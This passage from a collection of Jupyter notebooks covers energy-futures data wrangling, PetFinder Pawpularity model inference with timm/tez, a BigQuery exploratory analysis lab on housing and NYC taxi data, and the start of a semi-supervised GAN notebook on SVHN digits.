"WTI_option_df.to_csv(r\"./data/wrangled_data/WTI_option.csv\", index=False)",
"_____no_output_____"
],
[
"print(*os.listdir(\"./data/wrangled_data/\"), sep=\"\\n\")",
"WTI_futures.csv\nNG_option.csv\nWTI_option.csv\nAECO_futures.csv\nNG_futures.csv\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb036f3824cc4fa3f9c3788d56cbf2ac739ed458 | 19,128 | ipynb | Jupyter Notebook | tez-inference(1).ipynb | av192/Pet-Popularity-Prediction | fb4e5894ac3f9b2868fae21862acc7f247eb8b5f | [
"MIT"
] | null | null | null | tez-inference(1).ipynb | av192/Pet-Popularity-Prediction | fb4e5894ac3f9b2868fae21862acc7f247eb8b5f | [
"MIT"
] | null | null | null | tez-inference(1).ipynb | av192/Pet-Popularity-Prediction | fb4e5894ac3f9b2868fae21862acc7f247eb8b5f | [
"MIT"
] | null | null | null | 33.382199 | 161 | 0.530374 | [
[
[
"# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python Docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load\n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n# Input data files are available in the read-only \"../input/\" directory\n# For example, running this (by clicking run or pressing Shift+Enter) will list all files under the input directory\n\nimport os\n\n\n# You can write up to 20GB to the current directory (/kaggle/working/) that gets preserved as output when you create a version using \"Save & Run All\" \n# You can also write temporary files to /kaggle/temp/, but they won't be saved outside of the current session",
"_____no_output_____"
],
[
"import sys\nsys.path.append(\"../input/tez-lib/\")\nsys.path.append(\"../input/timmmaster/\")\n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport os\nimport torch\nimport torchvision\nimport sklearn\n%matplotlib inline\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\nimport torchvision.transforms as transforms\nfrom torchvision.io import read_image\nimport math\n\ntest_csv = pd.read_csv('../input/petfinder-pawpularity-score/test.csv')\nsubmission = pd.read_csv('../input/petfinder-pawpularity-score/sample_submission.csv')\n\ntest_dir = '../input/petfinder-pawpularity-score/test/'\n\ndef create_path(df,root_dir):\n df['Path'] = df['Id'].apply(lambda x: root_dir+x+'.jpg')\n \n \n \n \ncreate_path(test_csv,test_dir)\n\n# Create Label column (used later)\ntest_csv['Pawpularity'] = 100 ",
"_____no_output_____"
],
[
"def sigmoid(x):\n return 1 / (1 + math.exp(-x))\n\nclass CustomDataSet(Dataset):\n \n def __init__(self,csv_file,transform=None,augment_transform=None,root_dir ='../input/petfinder-pawpularity-score/train/' ):\n self.csv_file = csv_file\n self.transform = transform\n self.augment_trans = augment_transform\n self.root_dir = root_dir\n self.img_paths = self._get_img_paths(self.csv_file, root_dir)\n \n def __len__(self):\n return int(self.csv_file.shape[0])\n \n def __getitem__(self,idx):\n img_path = self.img_paths[idx]\n image = read_image(img_path)\n label = self.csv_file.Pawpularity.iloc[idx]/100\n image = image.type(torch.FloatTensor)\n \n if self.transform:\n image = self.transform(image)\n if self.augment_trans:\n image = self.augment_transform(image)\n \n image = torch.mul(image, (1/255))\n return {'image':image,'targets':label}\n \n def _get_img_paths(self,csv_file,root_dir):\n imgs = csv_file['Id'].apply(lambda x: root_dir+x+'.jpg').tolist()\n return imgs\n \n \n \n\nfrom torch.utils.data.sampler import SubsetRandomSampler\nnormalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\ntransform = transforms.Compose([\n normalize,\n transforms.Resize(255),\n transforms.CenterCrop(224)])\n\n\n\ntest_data = CustomDataSet(test_csv,transform,root_dir = test_dir) ",
"_____no_output_____"
],
[
"#!pip install timm\n#!pip install tez\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\nprint(device)\n\n\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nfrom torchvision import models\nimport time\nimport copy\n\nimport timm\nfrom tez.callbacks import EarlyStopping\n\n\nimport tez\nfrom tqdm import tqdm\n",
"cuda:0\n"
],
[
"import sys\nsys.path.append(\"../input/tez-lib/\")\nsys.path.append(\"../input/timmmaster/\")\nimport tez\nimport timm\n\nfrom tez.callbacks import EarlyStopping\n#sys.path.append(\"../input/tez-lib\")\n#sys.path.append(\"../input/timmmaster\")\nfrom sklearn import metrics\n\ndef mixup_loss(loss_fn, pred, y_a, y_b, lam):\n # get loss from current x n loss from watermarks n add\n return lam * loss_fn(pred, y_a) + (1 - lam) * loss_fn(pred, y_b)\n\nclass PawpularModel(tez.Model):\n def __init__(self,name):\n super().__init__()\n \n self.model = timm.create_model(name, pretrained=False, in_chans=3)\n self.model.head = nn.Linear(self.model.head.in_features, 128)\n self.dropout = nn.Dropout(p=0.5)\n self.dense1 = nn.Linear(128,1)\n \n self.step_scheduler_after = 'epoch'\n \n \n \n def forward(self, image, targets=None): \n # do mixup when have targets and state is train (doesnt do mixup at val)\n if ((targets is not None) and (self._train_state == True)):\n #image, features, target_a, target_b, lam = mixup_data(image, features, targets.view(-1,1)) \n image = image.to(device='cuda', dtype=torch.float)\n features = features.to(device='cuda', dtype=torch.float)\n target_a = target_a.to(device='cuda', dtype=torch.float)\n target_b = target_b.to(device='cuda', dtype=torch.float)\n x = self.model(image)\n x = self.dropout(x)\n # combine with meta features and shrink it down to 1 feature (score)\n \n x = self.dense1(x)\n \n \n \n return x, 0, {}",
"_____no_output_____"
],
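`mixup_loss` above expects a `mixup_data` helper that is not defined anywhere in this notebook (its call inside `forward` was commented out, and that version also mixed tabular meta-features). A minimal sketch of the standard image-only mixup it implies — purely illustrative, and the `alpha` default is an assumption:

```python
import numpy as np
import torch

def mixup_data(x, y, alpha=1.0):
    # Mixing coefficient drawn from a Beta(alpha, alpha) distribution
    lam = np.random.beta(alpha, alpha) if alpha > 0 else 1.0
    # Shuffle the batch to choose mixing partners
    index = torch.randperm(x.size(0), device=x.device)
    mixed_x = lam * x + (1 - lam) * x[index]
    y_a, y_b = y, y[index]
    return mixed_x, y_a, y_b, lam
```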
[
"#model = timm.create_model(\"swin_large_patch4_window12_384\",pretrained=True)",
"_____no_output_____"
],
[
"super_final_predictions = []\nsys.path.append(\"../input/tez-lib/\")\nsys.path.append(\"../input/timmmaster/\")\nfor fold_ in range(5):\n model = PawpularModel(\"swin_tiny_patch4_window7_224\")\n model.load(f\"../input/kfold-pet1/swin_tiny_patch4_window7_224_f{fold_}.bin\", device=\"cuda\", weights_only=True)\n\n df_test = pd.read_csv(\"../input/petfinder-pawpularity-score/test.csv\")\n #test_img_paths = [f\"../input/petfinder-pawpularity-score/test/{x}.jpg\" for x in df_test[\"Id\"].values]\n\n \n\n test_dataset = CustomDataSet(\n test_csv,transform,root_dir=test_dir\n )\n test_predictions = model.predict(test_dataset, batch_size=32, n_jobs=-1)\n\n final_test_predictions = []\n for preds in tqdm(test_predictions):\n final_test_predictions.extend(preds.ravel().tolist())\n\n final_test_predictions = [sigmoid(x) * 100 for x in final_test_predictions]\n super_final_predictions.append(final_test_predictions)\n\nsuper_final_predictions = np.mean(np.column_stack(super_final_predictions), axis=1)\ndf_test[\"Pawpularity\"] = super_final_predictions\ndf_test = df_test[[\"Id\", \"Pawpularity\"]]\ndf_test.to_csv(\"submission.csv\", index=False)",
"0it [00:00, ?it/s]\n1it [00:06, 6.19s/it]\n 0%| | 0/1 [00:06<?, ?it/s, stage=test]\u001b[A\n100%|██████████| 1/1 [00:06<00:00, 6.22s/it, stage=test]\n1it [00:06, 6.23s/it]\n0it [00:00, ?it/s]\n1it [00:00, 7.26it/s]\n 0%| | 0/1 [00:00<?, ?it/s, stage=test]\u001b[A\n100%|██████████| 1/1 [00:00<00:00, 5.43it/s, stage=test]\n1it [00:00, 5.17it/s]\n0it [00:00, ?it/s]\n1it [00:00, 7.48it/s]\n 0%| | 0/1 [00:00<?, ?it/s, stage=test]\u001b[A\n100%|██████████| 1/1 [00:00<00:00, 5.72it/s, stage=test]\n1it [00:00, 5.41it/s]\n0it [00:00, ?it/s]\n1it [00:00, 7.30it/s]\n 0%| | 0/1 [00:00<?, ?it/s, stage=test]\u001b[A\n100%|██████████| 1/1 [00:00<00:00, 5.51it/s, stage=test]\n1it [00:00, 5.21it/s]\n0it [00:00, ?it/s]\n1it [00:00, 7.45it/s]\n 0%| | 0/1 [00:00<?, ?it/s, stage=test]\u001b[A\n100%|██████████| 1/1 [00:00<00:00, 5.51it/s, stage=test]\n1it [00:00, 5.20it/s]\n"
],
[
"df_test",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb0381815d36ac1201d425c1a38c71203fd00d5a | 312,896 | ipynb | Jupyter Notebook | courses/machine_learning/deepdive2/launching_into_ml/solutions/python.BQ_explore_data.ipynb | shivchamkure/training-data-analyst | abee8f722970e9060549d13fbd3a0a44a720bfe7 | [
"Apache-2.0"
] | 6,140 | 2016-05-23T16:09:35.000Z | 2022-03-30T19:00:46.000Z | courses/machine_learning/deepdive2/launching_into_ml/solutions/python.BQ_explore_data.ipynb | shivchamkure/training-data-analyst | abee8f722970e9060549d13fbd3a0a44a720bfe7 | [
"Apache-2.0"
] | 1,384 | 2016-07-08T22:26:41.000Z | 2022-03-24T16:39:43.000Z | courses/machine_learning/deepdive2/launching_into_ml/solutions/python.BQ_explore_data.ipynb | shivchamkure/training-data-analyst | abee8f722970e9060549d13fbd3a0a44a720bfe7 | [
"Apache-2.0"
] | 5,110 | 2016-05-27T13:45:18.000Z | 2022-03-31T18:40:42.000Z | 153.305243 | 66,448 | 0.854319 | [
[
[
"# Exploratory Data Analysis Using Python and BigQuery\n\n\n\n## Learning Objectives\n\n1. Analyze a Pandas Dataframe\n2. Create Seaborn plots for Exploratory Data Analysis in Python \n3. Write a SQL query to pick up specific fields from a BigQuery dataset\n4. Exploratory Analysis in BigQuery\n\n\n## Introduction \nThis lab is an introduction to linear regression using Python and Scikit-Learn. This lab serves as a foundation for more complex algorithms and machine learning models that you will encounter in the course. We will train a linear regression model to predict housing price.\n\nEach learning objective will correspond to a __#TODO__ in the [student lab notebook](../labs/python.BQ_explore_data.ipynb) -- try to complete that notebook first before reviewing this solution notebook. \n",
"_____no_output_____"
],
[
"### Import Libraries",
"_____no_output_____"
]
],
[
[
"# Run the chown command to change the ownership\n!sudo chown -R jupyter:jupyter /home/jupyter/training-data-analyst",
"_____no_output_____"
],
[
"# Install the Google Cloud BigQuery library\n!pip install --user google-cloud-bigquery==1.25.0",
"_____no_output_____"
]
],
[
[
"Please ignore any incompatibility warnings and errors.\n",
"_____no_output_____"
],
[
"**Restart** the kernel before proceeding further (On the Notebook menu - Kernel - Restart Kernel).\n",
"_____no_output_____"
]
],
[
[
"# You can use any Python source file as a module by executing an import statement in some other Python source file.\n# The import statement combines two operations; it searches for the named module, then it binds the results of that search\n# to a name in the local scope.\nimport os \nimport pandas as pd\nimport numpy as np\n# Import matplotlib to visualize the model\nimport matplotlib.pyplot as plt\n# Seaborn is a Python data visualization library based on matplotlib\nimport seaborn as sns\n%matplotlib inline ",
"_____no_output_____"
]
],
[
[
"### Load the Dataset\n\n",
"_____no_output_____"
],
[
"Here, we create a directory called usahousing. This directory will hold the dataset that we copy from Google Cloud Storage.",
"_____no_output_____"
]
],
[
[
"# Create a directory to hold the dataset\nif not os.path.isdir(\"../data/explore\"):\n os.makedirs(\"../data/explore\")",
"_____no_output_____"
]
],
[
[
"Next, we copy the Usahousing dataset from Google Cloud Storage.",
"_____no_output_____"
]
],
[
[
"# Copy the file using `gsutil cp` from Google Cloud Storage in the required directory\n!gsutil cp gs://cloud-training/mlongcp/v3.0_MLonGC/toy_data/housing_pre-proc_toy.csv ../data/explore ",
"Copying gs://cloud-training/mlongcp/v3.0_MLonGC/toy_data/housing_pre-proc_toy.csv...\n/ [1 files][138.8 KiB/138.8 KiB] \nOperation completed over 1 objects/138.8 KiB. \n"
]
],
[
[
"Then we use the \"ls\" command to list files in the directory. This ensures that the dataset was copied.",
"_____no_output_____"
]
],
[
[
"# `ls` shows the working directory's contents. \n# The `l` flag list the all files with permissions and details\n!ls -l ../data/explore",
"total 140\n-rw-r--r-- 1 jupyter jupyter 142150 Dec 24 11:35 housing_pre-proc_toy.csv\n"
]
],
[
[
"Next, we read the dataset into a Pandas dataframe.",
"_____no_output_____"
]
],
[
[
"# TODO 1\n# Read a comma-separated values (csv) file into a DataFrame using the read_csv() function\ndf_USAhousing = pd.read_csv('../data/explore/housing_pre-proc_toy.csv')",
"_____no_output_____"
]
],
[
[
"### Inspect the Data",
"_____no_output_____"
]
],
[
[
"# Get the first five rows using the head() method\n\ndf_USAhousing.head()",
"_____no_output_____"
]
],
[
[
"Let's check for any null values.",
"_____no_output_____"
]
],
[
[
"# `isnull()` finds a null value in a column and `sum()` counts it\ndf_USAhousing.isnull().sum()",
"_____no_output_____"
],
[
"# Get some basic statistical details using describe() method\ndf_stats = df_USAhousing.describe()\n# Transpose index and columns of the dataframe\ndf_stats = df_stats.transpose()\ndf_stats",
"_____no_output_____"
],
[
"# Get a concise summary of a DataFrame\ndf_USAhousing.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 2500 entries, 0 to 2499\nData columns (total 10 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 longitude 2500 non-null float64\n 1 latitude 2500 non-null float64\n 2 housing_median_age 2500 non-null int64 \n 3 total_rooms 2500 non-null int64 \n 4 total_bedrooms 2500 non-null int64 \n 5 population 2500 non-null int64 \n 6 households 2500 non-null int64 \n 7 median_income 2500 non-null float64\n 8 median_house_value 2500 non-null int64 \n 9 ocean_proximity 2500 non-null object \ndtypes: float64(3), int64(6), object(1)\nmemory usage: 195.4+ KB\n"
]
],
[
[
"Let's take a peek at the first and last five rows of the data for all columns.",
"_____no_output_____"
]
],
[
[
"print (\"Rows : \" ,df_USAhousing.shape[0])\nprint (\"Columns : \" ,df_USAhousing.shape[1])\nprint (\"\\nFeatures : \\n\" ,df_USAhousing.columns.tolist())\nprint (\"\\nMissing values : \", df_USAhousing.isnull().sum().values.sum())\nprint (\"\\nUnique values : \\n\",df_USAhousing\n .nunique())",
"Rows : 2500\nColumns : 10\n\nFeatures : \n ['longitude', 'latitude', 'housing_median_age', 'total_rooms', 'total_bedrooms', 'population', 'households', 'median_income', 'median_house_value', 'ocean_proximity']\n\nMissing values : 0\n\nUnique values : \nlongitude 265\nlatitude 275\nhousing_median_age 51\ntotal_rooms 1889\ntotal_bedrooms 922\npopulation 1520\nhouseholds 890\nmedian_income 2186\nmedian_house_value 1553\nocean_proximity 4\ndtype: int64\n"
]
],
[
[
"## Explore the Data\n\nLet's create some simple plots to check out the data! ",
"_____no_output_____"
]
],
[
[
"# `heatmap` plots a rectangular data in a color-encoded matrix and\n# `corr` finds the pairwise correlation of all columns in the dataframe\nsns.heatmap(df_USAhousing.corr())",
"_____no_output_____"
]
],
[
[
"Create a displot showing \"median_house_value\".",
"_____no_output_____"
]
],
[
[
"# TODO 2a\n# Plot a univariate distribution of observations using seaborn `distplot()` function\nsns.displot(df_USAhousing['median_house_value'])",
"_____no_output_____"
],
[
"# Set the aesthetic style of the plots\nsns.set_style('whitegrid')\n# Plot a histogram using `hist()` function\ndf_USAhousing['median_house_value'].hist(bins=30)\nplt.xlabel('median_house_value')",
"_____no_output_____"
],
[
"x = df_USAhousing['median_income']\ny = df_USAhousing['median_house_value']\n\n# Scatter plot of y vs x using scatter() and `show()` display all open figures\nplt.scatter(x, y)\nplt.show()",
"_____no_output_____"
]
],
[
[
"Create a jointplot showing \"median_income\" versus \"median_house_value\".",
"_____no_output_____"
]
],
[
[
"# TODO 2b\n# `joinplot()` draws a plot of two variables with bivariate and univariate graphs.\nsns.jointplot(x='median_income',y='median_house_value',data=df_USAhousing)",
"_____no_output_____"
],
[
"# `countplot()` shows the counts of observations in each categorical bin using bars\nsns.countplot(x = 'ocean_proximity', data=df_USAhousing)",
"_____no_output_____"
],
[
"# takes numeric only?\n# plt.figure(figsize=(20,20))\n# Draw a multi-plot on every facet using `FacetGrid()`\ng = sns.FacetGrid(df_USAhousing, col=\"ocean_proximity\")\n# Pass a function and the name of one or more columns in the dataframe\ng.map(plt.hist, \"households\");",
"_____no_output_____"
],
[
"# takes numeric only?\n# plt.figure(figsize=(20,20))\n# Draw a multi-plot on every facet using `FacetGrid()`\ng = sns.FacetGrid(df_USAhousing, col=\"ocean_proximity\")\n# Pass a function and the name of one or more columns in the dataframe\ng.map(plt.hist, \"median_income\");",
"_____no_output_____"
]
],
[
[
"You can see below that this is the state of California!",
"_____no_output_____"
]
],
[
[
"x = df_USAhousing['latitude']\ny = df_USAhousing['longitude']\n\n# Scatter plot of y vs x and display all open figures\nplt.scatter(x, y)\nplt.show()",
"_____no_output_____"
]
],
[
[
"# Explore and create ML datasets\n\nIn this notebook, we will explore data corresponding to taxi rides in New York City to build a Machine Learning model in support of a fare-estimation tool. The idea is to suggest a likely fare to taxi riders so that they are not surprised, and so that they can protest if the charge is much higher than expected.\n\n## Learning objectives\n* Access and explore a public BigQuery dataset on NYC Taxi Cab rides\n* Visualize your dataset using the Seaborn library\n\n\nFirst, **restart the Kernel**. Now, let's start with the Python imports that we need.",
"_____no_output_____"
]
],
[
[
"# Import the python libraries\nfrom google.cloud import bigquery\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np",
"_____no_output_____"
]
],
[
[
"<h3> Extract sample data from BigQuery </h3>\n\nThe dataset that we will use is <a href=\"https://console.cloud.google.com/bigquery?project=nyc-tlc&p=nyc-tlc&d=yellow&t=trips&page=table\">a BigQuery public dataset</a>. Click on the link, and look at the column names. Switch to the Details tab to verify that the number of records is one billion, and then switch to the Preview tab to look at a few rows.\n\nLet's write a SQL query to pick up interesting fields from the dataset. It's a good idea to get the timestamp in a predictable format.",
"_____no_output_____"
]
],
[
[
"%%bigquery\n# SQL query to get a fields from dataset which prints the 10 records\nSELECT\n FORMAT_TIMESTAMP(\n \"%Y-%m-%d %H:%M:%S %Z\", pickup_datetime) AS pickup_datetime,\n pickup_longitude, pickup_latitude, dropoff_longitude,\n dropoff_latitude, passenger_count, trip_distance, tolls_amount, \n fare_amount, total_amount \n# TODO 3\nFROM\n `nyc-tlc.yellow.trips`\nLIMIT 10",
"_____no_output_____"
]
],
[
[
"Let's increase the number of records so that we can do some neat graphs. There is no guarantee about the order in which records are returned, and so no guarantee about which records get returned if we simply increase the LIMIT. To properly sample the dataset, let's use the HASH of the pickup time and return 1 in 100,000 records -- because there are 1 billion records in the data, we should get back approximately 10,000 records if we do this.\n\nWe will also store the BigQuery result in a Pandas dataframe named \"trips\"",
"_____no_output_____"
]
],
[
[
"%%bigquery trips\nSELECT\n FORMAT_TIMESTAMP(\n \"%Y-%m-%d %H:%M:%S %Z\", pickup_datetime) AS pickup_datetime,\n pickup_longitude, pickup_latitude, \n dropoff_longitude, dropoff_latitude,\n passenger_count,\n trip_distance,\n tolls_amount,\n fare_amount,\n total_amount\nFROM\n `nyc-tlc.yellow.trips`\nWHERE\n ABS(MOD(FARM_FINGERPRINT(CAST(pickup_datetime AS STRING)), 100000)) = 1",
"_____no_output_____"
],
[
"print(len(trips))",
"10789\n"
],
[
"# We can slice Pandas dataframes as if they were arrays\ntrips[:10]",
"_____no_output_____"
]
],
[
[
"<h3> Exploring data </h3>\n\nLet's explore this dataset and clean it up as necessary. We'll use the Python Seaborn package to visualize graphs and Pandas to do the slicing and filtering.",
"_____no_output_____"
]
],
[
[
"# TODO 4\n# Use Seaborn `regplot()` function to plot the data and a linear regression model fit.\nax = sns.regplot(\n x=\"trip_distance\", y=\"fare_amount\",\n fit_reg=False, ci=None, truncate=True, data=trips)\nax.figure.set_size_inches(10, 8)",
"_____no_output_____"
]
],
[
[
"Hmm ... do you see something wrong with the data that needs addressing?\n\nIt appears that we have a lot of invalid data that is being coded as zero distance and some fare amounts that are definitely illegitimate. Let's remove them from our analysis. We can do this by modifying the BigQuery query to keep only trips longer than zero miles and fare amounts that are at least the minimum cab fare ($2.50).\n\nNote the extra WHERE clauses.",
"_____no_output_____"
]
],
[
[
"%%bigquery trips\n# SQL query with where clause to save the results in the trips dataframe\nSELECT\n FORMAT_TIMESTAMP(\n \"%Y-%m-%d %H:%M:%S %Z\", pickup_datetime) AS pickup_datetime,\n pickup_longitude, pickup_latitude, \n dropoff_longitude, dropoff_latitude,\n passenger_count,\n trip_distance,\n tolls_amount,\n fare_amount,\n total_amount\nFROM\n `nyc-tlc.yellow.trips`\nWHERE\n ABS(MOD(FARM_FINGERPRINT(CAST(pickup_datetime AS STRING)), 100000)) = 1\n# TODO 4a\n AND trip_distance > 0\n AND fare_amount >= 2.5",
"_____no_output_____"
],
[
"print(len(trips))",
"10716\n"
],
[
"# Use Seaborn `regplot()` function to plot the data and a linear regression model fit.\nax = sns.regplot(\n x=\"trip_distance\", y=\"fare_amount\",\n fit_reg=False, ci=None, truncate=True, data=trips)\nax.figure.set_size_inches(10, 8)",
"_____no_output_____"
]
],
[
[
"What's up with the streaks around 45 dollars and 50 dollars? Those are fixed-amount rides from JFK and La Guardia airports into anywhere in Manhattan, i.e. to be expected. Let's list the data to make sure the values look reasonable.\n\nLet's also examine whether the toll amount is captured in the total amount.",
"_____no_output_____"
]
],
[
[
"tollrides = trips[trips[\"tolls_amount\"] > 0]\ntollrides[tollrides[\"pickup_datetime\"] == \"2012-02-27 09:19:10 UTC\"]",
"_____no_output_____"
],
[
"notollrides = trips[trips[\"tolls_amount\"] == 0]\nnotollrides[notollrides[\"pickup_datetime\"] == \"2012-02-27 09:19:10 UTC\"]",
"_____no_output_____"
]
],
[
[
"Looking at a few samples above, it should be clear that the total amount reflects fare amount, toll and tip somewhat arbitrarily -- this is because when customers pay cash, the tip is not known. So, we'll use the sum of fare_amount + tolls_amount as what needs to be predicted. Tips are discretionary and do not have to be included in our fare estimation tool.\n\nLet's also look at the distribution of values within the columns.",
"_____no_output_____"
]
],
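Since tips are discretionary, the quantity the model should learn is the metered fare plus tolls. One way to materialize that target on the sampled dataframe (the column name `target_fare` is just an illustrative choice):

```python
# Combine fare and tolls into the amount we actually want to predict
trips["target_fare"] = trips["fare_amount"] + trips["tolls_amount"]
trips[["fare_amount", "tolls_amount", "target_fare"]].head()
```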
[
[
"# Print the distribution of values within the columns using `describe()`\ntrips.describe()",
"_____no_output_____"
]
],
[
[
"Copyright 2021 Google Inc. Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at\nhttp://www.apache.org/licenses/LICENSE-2.0\nUnless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb038affb664c2e845b4b50bdfcd66fca75d07ee | 27,641 | ipynb | Jupyter Notebook | deep-learning/udacity-deeplearning/semi-supervised/semi-supervised_learning_2.ipynb | HiteshDhola/Artificial-Intelligence-Deep-Learning-Machine-Learning-Tutorials | a0b839d412d2e7e4d8f3b3d885e318650399b857 | [
"Apache-2.0"
] | 3,266 | 2017-08-06T16:51:46.000Z | 2022-03-30T07:34:24.000Z | semi-supervised/semi-supervised_learning_2.ipynb | Ruqyai/deep-learning | c6b46a0bfcb8d4afcb806174b3923d3ea89ca455 | [
"MIT"
] | 150 | 2017-08-28T14:59:36.000Z | 2022-03-11T23:21:35.000Z | semi-supervised/semi-supervised_learning_2.ipynb | Ruqyai/deep-learning | c6b46a0bfcb8d4afcb806174b3923d3ea89ca455 | [
"MIT"
] | 1,449 | 2017-08-06T17:40:59.000Z | 2022-03-31T12:03:24.000Z | 39.771223 | 507 | 0.538801 | [
[
[
"In this notebook, we'll learn how to use GANs to do semi-supervised learning.\n\nIn supervised learning, we have a training set of inputs $x$ and class labels $y$. We train a model that takes $x$ as input and gives $y$ as output.\n\nIn semi-supervised learning, our goal is still to train a model that takes $x$ as input and generates $y$ as output. However, not all of our training examples have a label $y$. We need to develop an algorithm that is able to get better at classification by studying both labeled $(x, y)$ pairs and unlabeled $x$ examples.\n\nTo do this for the SVHN dataset, we'll turn the GAN discriminator into an 11 class discriminator. It will recognize the 10 different classes of real SVHN digits, as well as an 11th class of fake images that come from the generator. The discriminator will get to train on real labeled images, real unlabeled images, and fake images. By drawing on three sources of data instead of just one, it will generalize to the test set much better than a traditional classifier trained on only one source of data.",
"_____no_output_____"
]
],
[
[
"%matplotlib inline\n\nimport pickle as pkl\nimport time\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.io import loadmat\nimport tensorflow as tf\n",
"_____no_output_____"
],
[
"!mkdir data",
"_____no_output_____"
],
[
"from urllib.request import urlretrieve\nfrom os.path import isfile, isdir\nfrom tqdm import tqdm\n\ndata_dir = 'data/'\n\nif not isdir(data_dir):\n raise Exception(\"Data directory doesn't exist!\")\n\nclass DLProgress(tqdm):\n last_block = 0\n\n def hook(self, block_num=1, block_size=1, total_size=None):\n self.total = total_size\n self.update((block_num - self.last_block) * block_size)\n self.last_block = block_num\n\nif not isfile(data_dir + \"train_32x32.mat\"):\n with DLProgress(unit='B', unit_scale=True, miniters=1, desc='SVHN Training Set') as pbar:\n urlretrieve(\n 'http://ufldl.stanford.edu/housenumbers/train_32x32.mat',\n data_dir + 'train_32x32.mat',\n pbar.hook)\n\nif not isfile(data_dir + \"test_32x32.mat\"):\n with DLProgress(unit='B', unit_scale=True, miniters=1, desc='SVHN Training Set') as pbar:\n urlretrieve(\n 'http://ufldl.stanford.edu/housenumbers/test_32x32.mat',\n data_dir + 'test_32x32.mat',\n pbar.hook)",
"_____no_output_____"
],
[
"trainset = loadmat(data_dir + 'train_32x32.mat')\ntestset = loadmat(data_dir + 'test_32x32.mat')",
"_____no_output_____"
],
[
"idx = np.random.randint(0, trainset['X'].shape[3], size=36)\nfig, axes = plt.subplots(6, 6, sharex=True, sharey=True, figsize=(5,5),)\nfor ii, ax in zip(idx, axes.flatten()):\n ax.imshow(trainset['X'][:,:,:,ii], aspect='equal')\n ax.xaxis.set_visible(False)\n ax.yaxis.set_visible(False)\nplt.subplots_adjust(wspace=0, hspace=0)",
"_____no_output_____"
],
[
"def scale(x, feature_range=(-1, 1)):\n # scale to (0, 1)\n x = ((x - x.min())/(255 - x.min()))\n \n # scale to feature_range\n min, max = feature_range\n x = x * (max - min) + min\n return x",
"_____no_output_____"
],
[
"class Dataset:\n def __init__(self, train, test, val_frac=0.5, shuffle=True, scale_func=None):\n split_idx = int(len(test['y'])*(1 - val_frac))\n self.test_x, self.valid_x = test['X'][:,:,:,:split_idx], test['X'][:,:,:,split_idx:]\n self.test_y, self.valid_y = test['y'][:split_idx], test['y'][split_idx:]\n self.train_x, self.train_y = train['X'], train['y']\n # The SVHN dataset comes with lots of labels, but for the purpose of this exercise,\n # we will pretend that there are only 1000.\n # We use this mask to say which labels we will allow ourselves to use.\n self.label_mask = np.zeros_like(self.train_y)\n self.label_mask[0:1000] = 1\n \n self.train_x = np.rollaxis(self.train_x, 3)\n self.valid_x = np.rollaxis(self.valid_x, 3)\n self.test_x = np.rollaxis(self.test_x, 3)\n \n if scale_func is None:\n self.scaler = scale\n else:\n self.scaler = scale_func\n self.train_x = self.scaler(self.train_x)\n self.valid_x = self.scaler(self.valid_x)\n self.test_x = self.scaler(self.test_x)\n self.shuffle = shuffle\n \n def batches(self, batch_size, which_set=\"train\"):\n x_name = which_set + \"_x\"\n y_name = which_set + \"_y\"\n \n num_examples = len(getattr(dataset, y_name))\n if self.shuffle:\n idx = np.arange(num_examples)\n np.random.shuffle(idx)\n setattr(dataset, x_name, getattr(dataset, x_name)[idx])\n setattr(dataset, y_name, getattr(dataset, y_name)[idx])\n if which_set == \"train\":\n dataset.label_mask = dataset.label_mask[idx]\n \n dataset_x = 